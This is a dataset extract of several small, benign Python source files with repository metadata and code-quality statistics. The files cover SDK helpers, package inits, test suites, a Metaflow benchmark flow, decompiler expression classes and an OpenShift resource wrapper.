| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
c7b83cd9ca38c782fd2f16946afd38cc61c7ab7c
| 131
|
py
|
Python
|
accelbyte_py_sdk/core/_decorators.py
|
encyphered/accelbyte-python-sdk
|
09c1e989d7251de308150fdcd3119d662ca2d205
|
[
"MIT"
] | null | null | null |
accelbyte_py_sdk/core/_decorators.py
|
encyphered/accelbyte-python-sdk
|
09c1e989d7251de308150fdcd3119d662ca2d205
|
[
"MIT"
] | null | null | null |
accelbyte_py_sdk/core/_decorators.py
|
encyphered/accelbyte-python-sdk
|
09c1e989d7251de308150fdcd3119d662ca2d205
|
[
"MIT"
] | null | null | null |
def same_doc_as(source):
def wrapper(target):
target.__doc__ = source.__doc__
return target
return wrapper
| 21.833333
| 39
| 0.664122
| 16
| 131
| 4.8125
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.267176
| 131
| 5
| 40
| 26.2
| 0.802083
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 4
|
c7e26556181b4b58fcb3a44c4c4d25c537b317c9
| 87
|
py
|
Python
|
ngl_resum/__init__.py
|
MarcelBalsiger/ngl_resum
|
982139b18d1d6a3d0dff5c803761de067ea1c5a3
|
[
"MIT"
] | null | null | null |
ngl_resum/__init__.py
|
MarcelBalsiger/ngl_resum
|
982139b18d1d6a3d0dff5c803761de067ea1c5a3
|
[
"MIT"
] | null | null | null |
ngl_resum/__init__.py
|
MarcelBalsiger/ngl_resum
|
982139b18d1d6a3d0dff5c803761de067ea1c5a3
|
[
"MIT"
] | 1
|
2021-06-17T17:46:25.000Z
|
2021-06-17T17:46:25.000Z
|
__author__ = "Marcel Balsiger <marcel.balsiger@hotmail.com>"
from .ngl_resum import *
| 21.75
| 60
| 0.770115
| 11
| 87
| 5.636364
| 0.818182
| 0.451613
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114943
| 87
| 3
| 61
| 29
| 0.805195
| 0
| 0
| 0
| 0
| 0
| 0.517241
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
1be145cace88d41b9b221677fefd7b5e81864b38
| 116
|
py
|
Python
|
ex_package/numpy_function.py
|
JStox/first_package
|
a9455ddec18ef5e0a02f3e4224d680ebf37479ff
|
[
"MIT"
] | null | null | null |
ex_package/numpy_function.py
|
JStox/first_package
|
a9455ddec18ef5e0a02f3e4224d680ebf37479ff
|
[
"MIT"
] | null | null | null |
ex_package/numpy_function.py
|
JStox/first_package
|
a9455ddec18ef5e0a02f3e4224d680ebf37479ff
|
[
"MIT"
] | null | null | null |
import numpy as np
def array_of_zeros(n):
print(f'You requested an array of {n} zeros.')
return np.zeros(n)
| 23.2
| 50
| 0.689655
| 22
| 116
| 3.545455
| 0.681818
| 0.179487
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.198276
| 116
| 5
| 51
| 23.2
| 0.83871
| 0
| 0
| 0
| 0
| 0
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.75
| 0.25
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 4
|
40013a4cc0576b913b89fcf7381fd5c98607d6f5
| 43
|
py
|
Python
|
quiz3/run_vector.py
|
pingsutw/sysprog21
|
a74594f4198ce16755a06bc3bb7222fe21e61fdb
|
[
"MIT"
] | null | null | null |
quiz3/run_vector.py
|
pingsutw/sysprog21
|
a74594f4198ce16755a06bc3bb7222fe21e61fdb
|
[
"MIT"
] | null | null | null |
quiz3/run_vector.py
|
pingsutw/sysprog21
|
a74594f4198ce16755a06bc3bb7222fe21e61fdb
|
[
"MIT"
] | null | null | null |
gcc -o vector -std=gnu11 vector.c
./vector
| 14.333333
| 33
| 0.72093
| 8
| 43
| 3.875
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054054
| 0.139535
| 43
| 2
| 34
| 21.5
| 0.783784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
4014178bb65f1d1a3e60616927c1ab88e3a8b077
| 81
|
py
|
Python
|
default.py
|
emilsvennesson/kodi-fsgo
|
0217cb40e776ae88a8f25b84313214c3d1fb83e0
|
[
"CC0-1.0"
] | 3
|
2016-10-15T17:28:06.000Z
|
2021-05-05T23:23:06.000Z
|
default.py
|
snoopyjoe/kodi-fsgo
|
4148f49e356d036edb8f8eb8c41b14dd0cc1fc1c
|
[
"CC0-1.0"
] | 11
|
2016-09-30T18:46:21.000Z
|
2021-07-07T16:45:33.000Z
|
default.py
|
emilsvennesson/kodi-fsgo
|
0217cb40e776ae88a8f25b84313214c3d1fb83e0
|
[
"CC0-1.0"
] | 7
|
2016-10-09T03:01:31.000Z
|
2018-11-10T20:55:33.000Z
|
# -*- coding: utf-8 -*-
import addon
if __name__ == '__main__':
addon.run()
| 13.5
| 26
| 0.580247
| 10
| 81
| 3.9
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015625
| 0.209877
| 81
| 5
| 27
| 16.2
| 0.59375
| 0.259259
| 0
| 0
| 0
| 0
| 0.137931
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
4041ea6c5916982f4171e5048c7fb9a26cba0fb3
| 2,679
|
py
|
Python
|
flows/many_big_low_entropy.py
|
tuulos/metaflow-datastore-tests
|
4acb2a5762246444ceff2b435de7c4062f063319
|
[
"Apache-2.0"
] | null | null | null |
flows/many_big_low_entropy.py
|
tuulos/metaflow-datastore-tests
|
4acb2a5762246444ceff2b435de7c4062f063319
|
[
"Apache-2.0"
] | null | null | null |
flows/many_big_low_entropy.py
|
tuulos/metaflow-datastore-tests
|
4acb2a5762246444ceff2b435de7c4062f063319
|
[
"Apache-2.0"
] | null | null | null |
import time
from metaflow import FlowSpec, step, profile
class ManyBig(FlowSpec):
"""
Test compression overhead with low-entropy artifacts.
Useful to compare against the high-entropy version since
the artifacts are about the same size.
"""
@step
def start(self):
nonce = str(time.time())
self.x00 = nonce + '00' * 50_000_000
self.x01 = nonce + '01' * 50_000_000
self.x02 = nonce + '02' * 50_000_000
self.x03 = nonce + '03' * 50_000_000
self.x04 = nonce + '04' * 50_000_000
self.x05 = nonce + '05' * 50_000_000
self.x06 = nonce + '06' * 50_000_000
self.x07 = nonce + '07' * 50_000_000
self.x08 = nonce + '08' * 50_000_000
self.x09 = nonce + '09' * 50_000_000
self.x10 = nonce + '10' * 50_000_000
self.x11 = nonce + '11' * 50_000_000
self.x12 = nonce + '12' * 50_000_000
self.x13 = nonce + '13' * 50_000_000
self.x14 = nonce + '14' * 50_000_000
self.x15 = nonce + '15' * 50_000_000
self.x16 = nonce + '16' * 50_000_000
self.x17 = nonce + '17' * 50_000_000
self.x18 = nonce + '18' * 50_000_000
self.x19 = nonce + '19' * 50_000_000
self.x20 = nonce + '20' * 50_000_000
self.x21 = nonce + '21' * 50_000_000
self.x22 = nonce + '22' * 50_000_000
self.x23 = nonce + '23' * 50_000_000
self.x24 = nonce + '24' * 50_000_000
self.x25 = nonce + '25' * 50_000_000
self.x26 = nonce + '26' * 50_000_000
self.x27 = nonce + '27' * 50_000_000
self.x28 = nonce + '28' * 50_000_000
self.x29 = nonce + '29' * 50_000_000
self.next(self.end)
@step
def end(self):
with profile('loading'):
self.x00 += '00'
self.x01 += '01'
self.x02 += '02'
self.x03 += '03'
self.x04 += '04'
self.x05 += '05'
self.x06 += '06'
self.x07 += '07'
self.x08 += '08'
self.x09 += '09'
self.x10 += '10'
self.x11 += '11'
self.x12 += '12'
self.x13 += '13'
self.x14 += '14'
self.x15 += '15'
self.x16 += '16'
self.x17 += '17'
self.x18 += '18'
self.x19 += '19'
self.x20 += '20'
self.x21 += '21'
self.x22 += '22'
self.x23 += '23'
self.x24 += '24'
self.x25 += '25'
self.x26 += '26'
self.x27 += '27'
self.x28 += '28'
self.x29 += '29'
if __name__ == '__main__':
ManyBig()
| 32.670732
| 60
| 0.48003
| 357
| 2,679
| 3.411765
| 0.282913
| 0.123153
| 0.197044
| 0.295567
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.288983
| 0.379993
| 2,679
| 81
| 61
| 33.074074
| 0.444311
| 0.055618
| 0
| 0.027778
| 0
| 0
| 0.053871
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027778
| false
| 0
| 0.027778
| 0
| 0.069444
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
40456936895bfb16d18f1432193b466508f15305
| 139
|
py
|
Python
|
linking/rust/using_ctypes.py
|
berquist/eg
|
4c368b12eaaffcf0af8032f10348cf8bc1c3957a
|
[
"Unlicense"
] | null | null | null |
linking/rust/using_ctypes.py
|
berquist/eg
|
4c368b12eaaffcf0af8032f10348cf8bc1c3957a
|
[
"Unlicense"
] | null | null | null |
linking/rust/using_ctypes.py
|
berquist/eg
|
4c368b12eaaffcf0af8032f10348cf8bc1c3957a
|
[
"Unlicense"
] | null | null | null |
import sys
import ctypes
from ctypes import c_uint32
lib = ctypes.cdll.LoadLibrary("target/debug/librust.so")
print(lib.addition(1, 2))
| 15.444444
| 56
| 0.769784
| 22
| 139
| 4.818182
| 0.772727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03252
| 0.115108
| 139
| 8
| 57
| 17.375
| 0.829268
| 0
| 0
| 0
| 0
| 0
| 0.165468
| 0.165468
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.6
| 0
| 0.6
| 0.2
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
404ffc370efe30c9266874c2d67104d02de090a1
| 255
|
py
|
Python
|
wideq/__init__.py
|
kkakkong/wideq
|
a44428be07df2f94a7a250936d0026ad7109dda8
|
[
"MIT"
] | null | null | null |
wideq/__init__.py
|
kkakkong/wideq
|
a44428be07df2f94a7a250936d0026ad7109dda8
|
[
"MIT"
] | null | null | null |
wideq/__init__.py
|
kkakkong/wideq
|
a44428be07df2f94a7a250936d0026ad7109dda8
|
[
"MIT"
] | null | null | null |
"""Reverse-engineered client for the LG SmartThinQ API.
"""
from .core import * # noqa
from .client import * # noqa
from .dryer import * # noqa
from .washer import * # noqa
from .dehum import * # noqa
from .ac import * # noqa
__version__ = '0.0.1'
| 23.181818
| 55
| 0.666667
| 36
| 255
| 4.611111
| 0.527778
| 0.361446
| 0.421687
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014925
| 0.211765
| 255
| 10
| 56
| 25.5
| 0.810945
| 0.32549
| 0
| 0
| 0
| 0
| 0.03125
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.857143
| 0
| 0.857143
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
40796837674ca76658869d55c2645634b98bc49a
| 89
|
py
|
Python
|
{{ cookiecutter.repo_service_reponame }}/tests/{{ cookiecutter.slug }}/test_{{ cookiecutter.slug }}.py
|
boilpy/boilpy
|
78f353a4b45e1df2e573993d686418dfc1f13cc8
|
[
"MIT"
] | 8
|
2018-11-03T12:50:42.000Z
|
2021-12-15T15:36:14.000Z
|
{{ cookiecutter.repo_service_reponame }}/tests/{{ cookiecutter.slug }}/test_{{ cookiecutter.slug }}.py
|
boilpy/boilpy
|
78f353a4b45e1df2e573993d686418dfc1f13cc8
|
[
"MIT"
] | 1
|
2021-09-03T16:55:39.000Z
|
2021-09-03T16:55:39.000Z
|
{{ cookiecutter.repo_service_reponame }}/tests/{{ cookiecutter.slug }}/test_{{ cookiecutter.slug }}.py
|
boilpy/boilpy
|
78f353a4b45e1df2e573993d686418dfc1f13cc8
|
[
"MIT"
] | null | null | null |
{% if cookiecutter.compat != "none" %}
from __future__ import absolute_import
{% endif %}
| 29.666667
| 38
| 0.719101
| 10
| 89
| 5.9
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134831
| 89
| 3
| 39
| 29.666667
| 0.766234
| 0
| 0
| 0
| 0
| 0
| 0.044444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.333333
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
40892a0cc0778e4c11c7d5a1c6affca2c82d64fe
| 152
|
py
|
Python
|
src/nibetaseries/cli/tests/test_run.py
|
RaginSagan/NiBetaSeries
|
578748f36436253f62d73dd6d2984936788a1224
|
[
"MIT"
] | null | null | null |
src/nibetaseries/cli/tests/test_run.py
|
RaginSagan/NiBetaSeries
|
578748f36436253f62d73dd6d2984936788a1224
|
[
"MIT"
] | null | null | null |
src/nibetaseries/cli/tests/test_run.py
|
RaginSagan/NiBetaSeries
|
578748f36436253f62d73dd6d2984936788a1224
|
[
"MIT"
] | null | null | null |
from ..run import get_parser
def test_get_parser():
try:
get_parser().parse_args(['-h'])
except SystemExit:
print('success')
| 15.2
| 39
| 0.611842
| 19
| 152
| 4.631579
| 0.789474
| 0.306818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 152
| 9
| 40
| 16.888889
| 0.77193
| 0
| 0
| 0
| 0
| 0
| 0.059603
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| true
| 0
| 0.166667
| 0
| 0.333333
| 0.166667
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
408ceb456f189907ffe35f7da23fc5abb9c5fc94
| 3,148
|
py
|
Python
|
tools/decompiler/expression.py
|
miniupnp/sundog
|
eb48447d1791e8bbd9ce4afe872a541dc67fcca1
|
[
"MIT"
] | 54
|
2017-01-31T08:14:04.000Z
|
2022-03-18T23:26:35.000Z
|
tools/decompiler/expression.py
|
miniupnp/sundog
|
eb48447d1791e8bbd9ce4afe872a541dc67fcca1
|
[
"MIT"
] | 9
|
2018-02-25T15:28:55.000Z
|
2021-10-15T14:29:44.000Z
|
tools/decompiler/expression.py
|
miniupnp/sundog
|
eb48447d1791e8bbd9ce4afe872a541dc67fcca1
|
[
"MIT"
] | 13
|
2017-01-29T12:38:26.000Z
|
2021-12-22T23:57:35.000Z
|
# Copyright (c) 2017 Wladimir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
####### Expressions ########
class Expression:
'''Base class for expression node'''
pass
class OpExpression(Expression):
'''Operation'''
def __init__(self, op, args):
self.op = op
self.args = args
def __repr__(self):
return '%s(%s)' % (self.op, ', '.join(repr(s) for s in self.args))
class ConstantExpression(Expression):
'''Any kind of constant expression'''
pass
class ConstantIntExpression(ConstantExpression):
def __init__(self, val):
self.val = val
def __repr__(self):
return '0x%x' % (self.val)
class NilExpression(ConstantExpression):
def __init__(self):
pass
def __repr__(self):
return 'nil'
class FunctionCall(Expression):
'''Function call expression'''
def __init__(self, func, sargs, scope, meta=None):
self.func = func
self.sargs = sargs
self.scope = scope # lex level, or None for global
self.meta = meta
def __repr__(self):
seg = self.func[0].rstrip().decode()
scope = '' if self.scope is None else '[l%d]' % (self.scope)
name = ''
if self.meta is not None and self.meta.name is not None:
name = '_' + self.meta.name.partition('(')[0]
return '%s%s_%02X%s(%s)' % (scope, seg, self.func[1], name, ', '.join(repr(s) for s in self.sargs))
class TakeAddressOf(Expression):
'''Take address of expression'''
def __init__(self, addrof):
self.addrof = addrof
def __repr__(self):
return '&'+repr(self.addrof)
class VariableRef(Expression):
'''Base class for variable references'''
def __init__(self):
pass
def __repr__(self):
return '(variableref)'
class GlobalVariableRef(VariableRef):
'''Reference to a global variable'''
def __init__(self, segment, num):
self.segment = segment
self.num = num
def __repr__(self):
return '%s_G%x' % (self.segment.rstrip().decode(),self.num)
class LocalVariableRef(VariableRef):
'''Reference to a local variable of current function or encompassing functions'''
def __init__(self, func, num):
self.func = func
self.num = num
def __repr__(self):
return '%s_%02x_L%x' % (self.func[0].rstrip().decode(), self.func[1], self.num)
class ParameterRef(LocalVariableRef):
'''Reference to a parameter of current function or encompassing functions'''
def __repr__(self):
return '%s_%02x_P%x' % (self.func[0].rstrip().decode(), self.func[1], self.num)
class ReturnValueRef(LocalVariableRef):
'''Reference to a return value of current function or encompassing functions'''
def __repr__(self):
return '%s_%02x_R%x' % (self.func[0].rstrip().decode(), self.func[1], self.num)
class TempVariableRef(VariableRef):
'''Reference to a stack temporary'''
def __init__(self, num):
self.num = num
def __repr__(self):
return 'T%x' % (self.num)
| 29.420561
| 107
| 0.630877
| 398
| 3,148
| 4.766332
| 0.276382
| 0.050606
| 0.063785
| 0.089615
| 0.274644
| 0.254085
| 0.252504
| 0.195572
| 0.132314
| 0.132314
| 0
| 0.009065
| 0.229034
| 3,148
| 106
| 108
| 29.698113
| 0.772559
| 0.21061
| 0
| 0.333333
| 0
| 0
| 0.039419
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.30303
| false
| 0.060606
| 0
| 0.151515
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 4
|
408e0d09ad0f4d18f8865f5eeb93ce12cdc0b7d5
| 240
|
py
|
Python
|
fediverse/views/renderer/object/Tombstone.py
|
YuzuRyo61/CrossPlan
|
7bdc9b688885cd2bcce8bdc1f4d65b225beeb122
|
[
"MIT"
] | 8
|
2020-01-22T07:44:59.000Z
|
2020-05-17T18:32:06.000Z
|
fediverse/views/renderer/object/Tombstone.py
|
YuzuRyo61/CrossPlan
|
7bdc9b688885cd2bcce8bdc1f4d65b225beeb122
|
[
"MIT"
] | 4
|
2021-03-19T08:17:48.000Z
|
2021-06-10T19:53:08.000Z
|
fediverse/views/renderer/object/Tombstone.py
|
YuzuRyo61/CrossPlan
|
7bdc9b688885cd2bcce8bdc1f4d65b225beeb122
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from django.urls import reverse
def RenderTombstone(uuid):
return {
"type": "Tombstone",
"id": f"https://{settings.CP_ENDPOINT}{reverse('PostDetail', kwargs={'uuid': str(uuid)})}"
}
| 26.666667
| 98
| 0.654167
| 28
| 240
| 5.571429
| 0.75
| 0.128205
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.183333
| 240
| 8
| 99
| 30
| 0.795918
| 0
| 0
| 0
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.285714
| 0.142857
| 0.571429
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 4
|
4094d92375b762c59f4f3895b50ba28b3897da5c
| 5,775
|
py
|
Python
|
tests/test_args.py
|
felixnext/python-functown
|
71bfdf39116de0c7ff3acf1cd81a881efd865177
|
[
"MIT"
] | null | null | null |
tests/test_args.py
|
felixnext/python-functown
|
71bfdf39116de0c7ff3acf1cd81a881efd865177
|
[
"MIT"
] | null | null | null |
tests/test_args.py
|
felixnext/python-functown
|
71bfdf39116de0c7ff3acf1cd81a881efd865177
|
[
"MIT"
] | null | null | null |
from distutils.util import strtobool
import json
import os
import sys
import pytest
from azure.functions import HttpRequest
from functown import RequestArgHandler
from functown.errors import ArgError
def test_arghandler_convert():
'''Test the Parameter Conversion Methods to ensure they work properly'''
args = RequestArgHandler(None)
# direct pass through
out = args._convert("foo", "baz", required=True)
assert out == "baz"
out = args._convert("foo", "baz", required=True, map_fct=lambda x: x.upper())
assert out == "BAZ"
out = args._convert("foo", "baz", required=True, map_fct="upper")
assert out == "BAZ"
out = args._convert("foo", None, map_fct="upper")
assert out is None
# check default
out = args._convert("foo", None, default="baz")
assert out == "baz"
# bool conversion
out = args._convert("foo", "true", required=True, map_fct=lambda x: bool(strtobool(x)))
assert out is True
out = args._convert("foo", "false", required=True, map_fct=lambda x: bool(strtobool(x)))
assert out is False
out = args._convert("foo", "false", required=True, map_fct="bool")
assert out is False
out = args._convert("foo", "true", required=True, map_fct="bool")
assert out is True
# check allowed values
out = args._convert("foo", "bar", allowed=["foo", "bar", "baz"])
assert out == "bar"
out = args._convert("foo", "bar", allowed=["FOO", "BAR", "BAZ"], list_map="upper")
assert out == "bar"
out = args._convert("foo", "bar", allowed=["FOO", "BAR", "BAZ"], map_fct="upper")
assert out == "BAR"
out = args._convert("foo", None, allowed=["FOO", "BAR", "BAZ"], map_fct="upper")
assert out is None
# check default convert
out = args._convert("foo", None, default=True, map_fct=strtobool)
assert out is True
# test error cases
with pytest.raises(ArgError):
out = args._convert("foo", None, required=True)
with pytest.raises(ArgError):
out = args._convert("foo", "bar", allowed=["foo", "baz"])
def test_arghandler_params():
'''Ensure that we can parse arguments from url query params'''
req = HttpRequest("GET", "foo/bar", params={"foo": "1", "bar": "true", "baz": "opt1"}, body=None)
args = RequestArgHandler(req)
# handle requests
out = args.get_query("foo")
assert out == "1"
out = args.get_query("foo", map_fct=int)
assert out == 1
out = args.get_query("bar", map_fct="bool")
assert out is True
out = args.get_query("baz")
assert out == "opt1"
out = args.get_query("baz", allowed=["opt1", "opt2"])
assert out == "opt1"
with pytest.raises(ArgError):
out = args.get_query("baz", allowed=["opt3", "opt2"])
out = args.get_query("not_there")
assert out is None
out = args.get_query("not_there", default=True)
assert out is True
def test_arghandler_body():
'''Ensure that we can parse arguments from request body'''
req = HttpRequest("GET", "foo/bar", body=json.dumps({"foo": "1", "bar": "true", "baz": "opt1"}).encode("utf-8"))
args = RequestArgHandler(req)
# handle requests
out = args.get_body("foo")
assert out == "1"
out = args.get_body("foo", map_fct=int)
assert out == 1
out = args.get_body("bar", map_fct="bool")
assert out is True
out = args.get_body("baz")
assert out == "opt1"
out = args.get_body("baz", allowed=["opt1", "opt2"])
assert out == "opt1"
with pytest.raises(ArgError):
out = args.get_body("baz", allowed=["opt3", "opt2"])
out = args.get_body("not_there")
assert out is None
out = args.get_body("not_there", default=True)
assert out is True
def test_arghandler_querybody():
'''Ensure that we can parse arguments in combined fashion'''
# split parameters and test all extrems
req3 = HttpRequest("GET", "foo/bar", params={"foo": "1", "bar": "true"}, body=json.dumps({"baz": "opt1"}).encode("utf-8"))
req2 = HttpRequest("GET", "foo/bar", body=json.dumps({"foo": "1", "bar": "true", "baz": "opt1"}).encode("utf-8"))
req1 = HttpRequest("GET", "foo/bar", params={"foo": "1", "bar": "true", "baz": "opt1"}, body=None)
# iterate through different request types
for req in [req1, req2, req3]:
args = RequestArgHandler(req)
# handle requests
out = args.get_body_query("foo")
assert out == "1"
out = args.get_body_query("foo", map_fct=int)
assert out == 1
out = args.get_body_query("bar", map_fct="bool")
assert out is True
out = args.get_body_query("baz")
assert out == "opt1"
out = args.get_body_query("baz", allowed=["opt1", "opt2"])
assert out == "opt1"
with pytest.raises(ArgError):
out = args.get_body_query("baz", allowed=["opt3", "opt2"])
out = args.get_body_query("not_there")
assert out is None
out = args.get_body_query("not_there", default=True)
assert out is True
def test_arghandler_route():
'''Ensure that we can parse arguments from request body'''
req = HttpRequest("GET", "foo/bar", route_params={"area": "foo"}, body=None)
args = RequestArgHandler(req)
# handle requests
out = args.get_route("area")
assert out == "foo"
out = args.get_route("area", required=True)
assert out == "foo"
out = args.get_route("area", required=True, allowed=["foo", "bar"])
assert out == "foo"
out = args.get_route("section", default="bar")
assert out == "bar"
with pytest.raises(ArgError):
out = args.get_route("area", allowed=["bar", "baz"])
out = args.get_route("not_there")
assert out is None
out = args.get_route("not_there", default=True)
assert out is True
| 33.575581
| 126
| 0.621991
| 796
| 5,775
| 4.398241
| 0.128141
| 0.093973
| 0.088546
| 0.077692
| 0.806341
| 0.792059
| 0.758926
| 0.718081
| 0.573836
| 0.447015
| 0
| 0.009469
| 0.21368
| 5,775
| 172
| 127
| 33.575581
| 0.761506
| 0.092987
| 0
| 0.420168
| 0
| 0
| 0.119377
| 0
| 0
| 0
| 0
| 0
| 0.344538
| 1
| 0.042017
| false
| 0
| 0.067227
| 0
| 0.109244
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
409c8388e6241ac0e2526c76e6ac7f92f79a225d
| 179
|
py
|
Python
|
ocp_resources/prometheus_rule.py
|
kbidarkar/openshift-python-wrapper
|
3cd4d6d3b71c82ff87f032a51510d9c9d207f6cb
|
[
"Apache-2.0"
] | null | null | null |
ocp_resources/prometheus_rule.py
|
kbidarkar/openshift-python-wrapper
|
3cd4d6d3b71c82ff87f032a51510d9c9d207f6cb
|
[
"Apache-2.0"
] | null | null | null |
ocp_resources/prometheus_rule.py
|
kbidarkar/openshift-python-wrapper
|
3cd4d6d3b71c82ff87f032a51510d9c9d207f6cb
|
[
"Apache-2.0"
] | null | null | null |
from ocp_resources.resource import Resource
class PrometheusRule(Resource):
"""
Prometheus Rule object.
"""
api_group = Resource.ApiGroup.MONITORING_COREOS_COM
| 17.9
| 55
| 0.73743
| 19
| 179
| 6.736842
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.184358
| 179
| 9
| 56
| 19.888889
| 0.876712
| 0.128492
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
